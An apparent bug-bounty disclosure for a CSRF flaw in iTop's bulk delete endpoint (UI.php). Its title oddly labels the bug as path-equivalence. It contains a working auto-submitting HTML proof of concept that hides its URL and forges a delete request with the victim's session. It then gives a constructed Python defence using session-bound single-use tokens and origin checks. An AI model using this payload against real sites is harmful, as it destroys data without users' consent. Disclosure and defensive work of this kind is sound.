Improper Resolution of Path Equivalence in combodo/itop
Valid
Reported on Nov 24th 2021
Description
CSRF (cross-site request forgery) bug in the bulk delete operation of UI.php
Proof of Concept
The request below is vulnerable to CSRF: the following page, when loaded in a logged-in user's browser, auto-submits a bulk delete of the SLA object with id 1 as that user.
<html>
<body>
<!-- hide the attacker page URL from the address bar before submitting -->
<script>history.pushState('', '', '/')</script>
<!-- forged POST to the iTop delete endpoint; the browser attaches the victim's session cookie -->
<form action="http://localhost:8008/web/pages/UI.php?operation=delete&class=SLA&id=1&c[menu]=SLA" method="POST">
<input type="hidden" name="transaction_id" value="admE469.tmp" />
<input type="hidden" name="operation" value="bulk_delete_confirmed" />
<input type="hidden" name="filter" value="%5B%22SELECT+%60SLA%60+FROM+SLA+AS+%60SLA%60+WHERE+%28%60SLA%60.%60id%60+IN+%28%271%27%29%29%22%2C%5B%5D%2C%5B%5D%5D" />
<input type="hidden" name="class" value="SLA" />
<input type="hidden" name="selectObject[]" value="1" />
<input type="hidden" name="c[menu]" value="SLA" />
<input type="submit" value="Submit request" />
</form>
<!-- submit automatically, no user interaction needed -->
<script>
document.forms[0].submit();
</script>
</body>
</html>
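The PoC works because the server accepts the destructive POST without proving that the `transaction_id` came from a page it issued to this session, and without checking where the request originated. The following is an added, constructed example of how such an endpoint can be gated server-side; it is not iTop's code and does not describe the fix shipped in 2.7.6. The `Session`, `handle_bulk_delete`, `TRUSTED_ORIGIN` and the form dictionaries are all hypothetical models of the request shown above: the token is minted with a CSPRNG, stored server-side per session, expires, is single-use, and is compared in constant time, and the `Origin`/`Referer` header is checked against the site's own origin as a second, independent control.

```python
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Optional, Tuple
from urllib.parse import urlparse

# Hypothetical server-side model of the delete endpoint targeted by the PoC.
# Everything here is constructed for illustration; it is not iTop code.

TOKEN_TTL_SECONDS = 15 * 60
TRUSTED_ORIGIN = "http://localhost:8008"   # site origin taken from the PoC form action


@dataclass
class Session:
    """One authenticated session; issued tokens live server-side, keyed by value."""
    user: str
    tokens: dict = field(default_factory=dict)  # token value -> issue time (epoch seconds)


def issue_transaction_id(session: Session, now: Optional[float] = None) -> str:
    """Mint an unpredictable, session-bound, single-use token for a state-changing form."""
    token = secrets.token_urlsafe(32)
    session.tokens[token] = now if now is not None else time.time()
    return token


def origin_is_trusted(headers: dict) -> bool:
    """Accept only same-origin requests by Origin, falling back to Referer; neither -> reject."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        p = urlparse(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == TRUSTED_ORIGIN


def validate_transaction_id(session: Session, submitted: Optional[str],
                            now: Optional[float] = None) -> bool:
    """True only if the token was issued to this session, is unexpired, and has not been used."""
    if not submitted:
        return False
    now = now if now is not None else time.time()
    for token, issued in list(session.tokens.items()):
        if now - issued > TOKEN_TTL_SECONDS:
            del session.tokens[token]      # garbage-collect expired tokens
            continue
        if hmac.compare_digest(token, submitted):
            del session.tokens[token]      # single use: a replayed token fails
            return True
    return False


def handle_bulk_delete(session: Session, headers: dict, form: dict) -> Tuple[int, str]:
    """Gate the destructive operation on both checks; returns (HTTP status, message)."""
    if form.get("operation") != "bulk_delete_confirmed":
        return 400, "unexpected operation"
    if not origin_is_trusted(headers):
        return 403, "cross-site request refused"
    if not validate_transaction_id(session, form.get("transaction_id")):
        return 403, "invalid or expired transaction_id"
    ids = form.get("selectObject[]", [])
    return 200, f"deleted {form.get('class')} ids {ids}"


# Constructed requests: a forged one carrying the token value from the PoC above,
# and a legitimate one carrying a freshly issued token and a same-origin Origin header.
FORGED_FORM = {
    "transaction_id": "admE469.tmp",
    "operation": "bulk_delete_confirmed",
    "class": "SLA",
    "selectObject[]": ["1"],
}
FORGED_HEADERS = {"Origin": "http://attacker.example"}  # constructed cross-site origin


def demo() -> Tuple[int, int, int]:
    """Run forged, legitimate, and replayed requests; returns their three status codes."""
    sess = Session(user="admin")
    forged_status, _ = handle_bulk_delete(sess, FORGED_HEADERS, FORGED_FORM)
    token = issue_transaction_id(sess)
    good_form = dict(FORGED_FORM, transaction_id=token)
    good_status, _ = handle_bulk_delete(sess, {"Origin": TRUSTED_ORIGIN}, good_form)
    replay_status, _ = handle_bulk_delete(sess, {"Origin": TRUSTED_ORIGIN}, good_form)
    return forged_status, good_status, replay_status


if __name__ == "__main__":
    print(demo())  # (403, 200, 403)
```

The two checks are deliberately independent: the origin check stops the forged submission even if an attacker could guess a token, and the session-bound single-use token stops it even when a browser strips `Origin` and `Referer`. Marking the session cookie `SameSite=Lax` or `Strict` is a third layer that prevents the cookie from being attached to the cross-site POST in the first place.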
We are processing your report and will contact the combodo/itop team within 24 hours.
This is a duplicate of https://huntr.dev/bounties/0a39630d-f4b9-4468-86d8-aea3b02f91ae/?token=4d1195d5a50a9f0f7ae9fc24a2b0a3bd907427edaf7ee6ac1f8f31c11d8b7a5d2c204957125e63fd7cf3a87df6d5d12a35f9c7107ba5f33b5f668fa199a36932448b9bf186daa62cb32b5635770730eb68eeeba079b8864ab00358fd0dc65fa406d986525814a14951db2025e117f0098a1f270f5a5b2c935a65b00b5106e5511b61d501c4357654cb8ea76b
Was fixed in 2.7.6. Corresponding GitHub advisory: https://github.com/Combodo/iTop/security/advisories/GHSA-33pr-5776-9jqf
The fix bounty has been dropped
This vulnerability will not receive a CVE